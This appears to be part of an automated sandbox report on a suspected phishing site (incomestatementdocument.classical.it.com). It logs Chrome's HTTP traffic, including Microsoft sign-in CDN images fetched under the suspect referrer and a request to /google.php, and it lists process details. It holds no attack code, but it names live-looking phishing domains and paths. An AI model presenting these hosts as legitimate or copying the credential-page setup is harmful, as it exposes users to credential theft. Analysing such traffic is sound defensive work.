                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 923709a9cf93de9c-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=108170&min_rtt=107292&rtt_var=23419&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1292&delivery_rate=34654&cwnd=252&unsent_bytes=0&cid=1ea2cccd83058b5b&ts=4635&x=0"
                                                                                        2025-03-20 17:48:02 UTC22INData Raw: 31 30 0d 0a 7b 22 73 74 61 74 75 73 22 3a 66 61 6c 73 65 7d 0d 0a
                                                                                        Data Ascii: 10{"status":false}
                                                                                        2025-03-20 17:48:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        35192.168.2.164976823.56.162.514436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:47:58 UTC725OUTGET /dxetjqzbe/image/upload/v1742052868/6059C6BA-9C9F-4199-8218-8895A9F0C3C8_ctielh.png HTTP/1.1
                                                                                        Host: res.cloudinary.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: image
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Referer: https://incomestatementdocument.classical.it.com/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:47:58 UTC832INHTTP/1.1 200 OK
                                                                                        Content-Type: image/png
                                                                                        Content-Length: 21873
                                                                                        ETag: "568f3323a159c49c955a6e9e5ce8ac4d"
                                                                                        Last-Modified: Sat, 15 Mar 2025 15:34:29 GMT
                                                                                        Date: Thu, 20 Mar 2025 17:47:58 GMT
                                                                                        Connection: close
                                                                                        Cache-Control: public, no-transform, immutable, max-age=2592000
                                                                                        x-request-id: 66832d6d13078dacf529e15646e9e921
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Disposition,Content-Range,Etag,Server-Timing,Vary,X-Cld-Error,X-Robots-Tag,X-Content-Type-Options
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Accept-Ranges: bytes
                                                                                        Timing-Allow-Origin: *
                                                                                        Server: Cloudinary
                                                                                        Strict-Transport-Security: max-age=604800
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Server-Timing: cld-akam;dur=44;start=2025-03-20T17:47:58.437Z;desc=hit,rtt;dur=101,content-info;desc="width=2016,height=2016,bytes=21873,format=\"png\",o=1,crt=1742052868,ef=(17)"
                                                                                        2025-03-20 17:47:58 UTC15552INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 07 e0 00 00 07 e0 08 06 00 00 00 f6 b1 41 ec 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 20 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 30 2d 63 30 36 30 20 36 31 2e 31 33 34 37 37 37 2c 20 32 30 31 30 2f 30 32 2f 31 32 2d 31 37 3a 33 32 3a 30 30 20 20
                                                                                        Data Ascii: PNGIHDRAtEXtSoftwareAdobe ImageReadyqe< iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00
                                                                                        2025-03-20 17:47:58 UTC6321INData Raw: 00 00 00 08 08 f0 00 00 00 00 00 00 00 10 10 e0 01 00 00 00 00 00 00 20 20 c0 03 00 00 00 00 00 00 40 40 80 07 00 00 00 00 00 00 80 80 00 0f 00 00 00 00 00 00 00 01 01 1e 00 00 00 00 00 00 00 02 02 3c 00 00 00 00 00 00 00 04 04 78 00 00 00 00 00 00 00 08 08 f0 00 00 00 00 00 00 00 10 10 e0 01 00 00 00 00 00 00 20 20 c0 03 00 00 00 00 00 00 40 40 80 07 00 00 00 00 00 00 80 80 00 0f 00 00 00 00 00 00 00 01 01 1e 00 00 00 00 00 00 00 02 02 3c 00 00 00 00 00 00 00 04 04 78 00 00 00 00 00 00 00 08 08 f0 00 00 00 00 00 00 00 10 10 e0 01 00 00 00 00 00 00 20 20 c0 03 00 00 00 00 00 00 40 40 80 07 00 00 00 00 00 00 80 80 00 0f 00 00 00 00 00 00 00 01 01 1e 00 00 00 00 00 00 00 02 02 3c 00 00 00 00 00 00 00 04 04 78 00 00 00 00 00 00 00 08 08 f0 00 00 00 00 00 00
                                                                                        Data Ascii: @@<x @@<x @@<x


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        36192.168.2.164977023.56.162.514436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:47:58 UTC464OUTGET /dxetjqzbe/image/upload/v1742052868/6059C6BA-9C9F-4199-8218-8895A9F0C3C8_ctielh.png HTTP/1.1
                                                                                        Host: res.cloudinary.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:47:59 UTC830INHTTP/1.1 200 OK
                                                                                        Content-Type: image/png
                                                                                        Content-Length: 21873
                                                                                        ETag: "568f3323a159c49c955a6e9e5ce8ac4d"
                                                                                        Last-Modified: Sat, 15 Mar 2025 15:34:29 GMT
                                                                                        Date: Thu, 20 Mar 2025 17:47:59 GMT
                                                                                        Connection: close
                                                                                        Cache-Control: public, no-transform, immutable, max-age=2592000
                                                                                        x-request-id: 66832d6d13078dacf529e15646e9e921
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Disposition,Content-Range,Etag,Server-Timing,Vary,X-Cld-Error,X-Robots-Tag,X-Content-Type-Options
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Accept-Ranges: bytes
                                                                                        Timing-Allow-Origin: *
                                                                                        Server: Cloudinary
                                                                                        Strict-Transport-Security: max-age=604800
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Server-Timing: cld-akam;dur=8;start=2025-03-20T17:47:59.118Z;desc=hit,rtt;dur=99,content-info;desc="width=2016,height=2016,bytes=21873,format=\"png\",o=1,crt=1742052868,ef=(17)"
                                                                                        2025-03-20 17:47:59 UTC15554INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 07 e0 00 00 07 e0 08 06 00 00 00 f6 b1 41 ec 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 20 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 30 2d 63 30 36 30 20 36 31 2e 31 33 34 37 37 37 2c 20 32 30 31 30 2f 30 32 2f 31 32 2d 31 37 3a 33 32 3a 30 30 20 20
                                                                                        Data Ascii: PNGIHDRAtEXtSoftwareAdobe ImageReadyqe< iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00
                                                                                        2025-03-20 17:47:59 UTC6319INData Raw: 00 08 08 f0 00 00 00 00 00 00 00 10 10 e0 01 00 00 00 00 00 00 20 20 c0 03 00 00 00 00 00 00 40 40 80 07 00 00 00 00 00 00 80 80 00 0f 00 00 00 00 00 00 00 01 01 1e 00 00 00 00 00 00 00 02 02 3c 00 00 00 00 00 00 00 04 04 78 00 00 00 00 00 00 00 08 08 f0 00 00 00 00 00 00 00 10 10 e0 01 00 00 00 00 00 00 20 20 c0 03 00 00 00 00 00 00 40 40 80 07 00 00 00 00 00 00 80 80 00 0f 00 00 00 00 00 00 00 01 01 1e 00 00 00 00 00 00 00 02 02 3c 00 00 00 00 00 00 00 04 04 78 00 00 00 00 00 00 00 08 08 f0 00 00 00 00 00 00 00 10 10 e0 01 00 00 00 00 00 00 20 20 c0 03 00 00 00 00 00 00 40 40 80 07 00 00 00 00 00 00 80 80 00 0f 00 00 00 00 00 00 00 01 01 1e 00 00 00 00 00 00 00 02 02 3c 00 00 00 00 00 00 00 04 04 78 00 00 00 00 00 00 00 08 08 f0 00 00 00 00 00 00 00 10
                                                                                        Data Ascii: @@<x @@<x @@<x


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        37192.168.2.1649771172.67.216.2074436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:48:03 UTC395OUTGET /google.php HTTP/1.1
                                                                                        Host: xzoe.classical.it.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:48:03 UTC831INHTTP/1.1 200 OK
                                                                                        Date: Thu, 20 Mar 2025 17:48:03 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Powered-By: PHP/8.0.30
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qTN4h3dJ%2BU6QN7hG%2BqaM3OwFsRZgJAde9BmeK4axh%2FpoHaMLxKiTe1H%2FhZi1dhd43oWcipuV8puHX4fp4haLKccT4dP40xhURadM8ktYpn8zSE8WEvjm3pTUySxf%2FoehqaDQrCqJ%2FUg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 923709c8d8200f53-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=104567&min_rtt=104152&rtt_var=22341&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2841&recv_bytes=967&delivery_rate=35721&cwnd=230&unsent_bytes=0&cid=1253adb093f1bc0d&ts=453&x=0"
                                                                                        2025-03-20 17:48:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        38192.168.2.164977423.209.72.314436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:48:06 UTC720OUTGET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1
                                                                                        Host: aadcdn.msftauth.net
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: image
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Referer: https://incomestatementdocument.classical.it.com/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:48:06 UTC612INHTTP/1.1 200 OK
                                                                                        Content-Type: image/svg+xml
                                                                                        Content-MD5: DhdidjYrlCeaRJJRG/y9mA==
                                                                                        Last-Modified: Wed, 15 Jan 2025 17:54:26 GMT
                                                                                        ETag: "0x8DD358DA72AAF33"
                                                                                        x-ms-request-id: d9dbeb0f-b01e-00e4-2876-67c4b2000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        Access-Control-Expose-Headers: Accept-Ranges,Cache-Control,Content-Encoding,Content-Length,Content-MD5,Content-Type,Date,ETag,Last-Modified,Server,x-ms-request-id,x-ms-version
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cache-Control: public, max-age=26006745
                                                                                        Date: Thu, 20 Mar 2025 17:48:06 GMT
                                                                                        Content-Length: 1864
                                                                                        Connection: close
                                                                                        Akamai-GRN: 0.9f04d217.1742492886.96c5c8b
                                                                                        2025-03-20 17:48:06 UTC1864INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31 34 30 31 2e 36
                                                                                        Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        39192.168.2.164977823.209.72.94436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:48:06 UTC459OUTGET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1
                                                                                        Host: aadcdn.msftauth.net
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:48:07 UTC612INHTTP/1.1 200 OK
                                                                                        Content-Type: image/svg+xml
                                                                                        Content-MD5: DhdidjYrlCeaRJJRG/y9mA==
                                                                                        Last-Modified: Wed, 15 Jan 2025 17:54:26 GMT
                                                                                        ETag: "0x8DD358DA72AAF33"
                                                                                        x-ms-request-id: d9dbeb0f-b01e-00e4-2876-67c4b2000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        Access-Control-Expose-Headers: Accept-Ranges,Cache-Control,Content-Encoding,Content-Length,Content-MD5,Content-Type,Date,ETag,Last-Modified,Server,x-ms-request-id,x-ms-version
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cache-Control: public, max-age=26006710
                                                                                        Date: Thu, 20 Mar 2025 17:48:06 GMT
                                                                                        Content-Length: 1864
                                                                                        Connection: close
                                                                                        Akamai-GRN: 0.8904d217.1742492886.4dbf752
                                                                                        2025-03-20 17:48:07 UTC1864INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31 34 30 31 2e 36
                                                                                        Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6


                                                                                        050100s020406080100

                                                                                        Click to jump to process

                                                                                        050100s0.0050100MB

                                                                                        Click to jump to process

                                                                                        Target ID:0
                                                                                        Start time:13:46:20
                                                                                        Start date:20/03/2025
                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                        Imagebase:0x7ff77eaf0000
                                                                                        File size:3'388'000 bytes
                                                                                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:false

                                                                                        Target ID:1
                                                                                        Start time:13:46:21
                                                                                        Start date:20/03/2025
                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2068,i,3826316609623489893,17020259341464328853,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2260 /prefetch:3
                                                                                        Imagebase:0x7ff77eaf0000
                                                                                        File size:3'388'000 bytes
                                                                                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:false

                                                                                        Target ID:2
                                                                                        Start time:13:46:22
                                                                                        Start date:20/03/2025
                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://incomestatementdocument.classical.it.com/NC6tS/"
                                                                                        Imagebase:0x7ff77eaf0000
                                                                                        File size:3'388'000 bytes
                                                                                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        No disassembly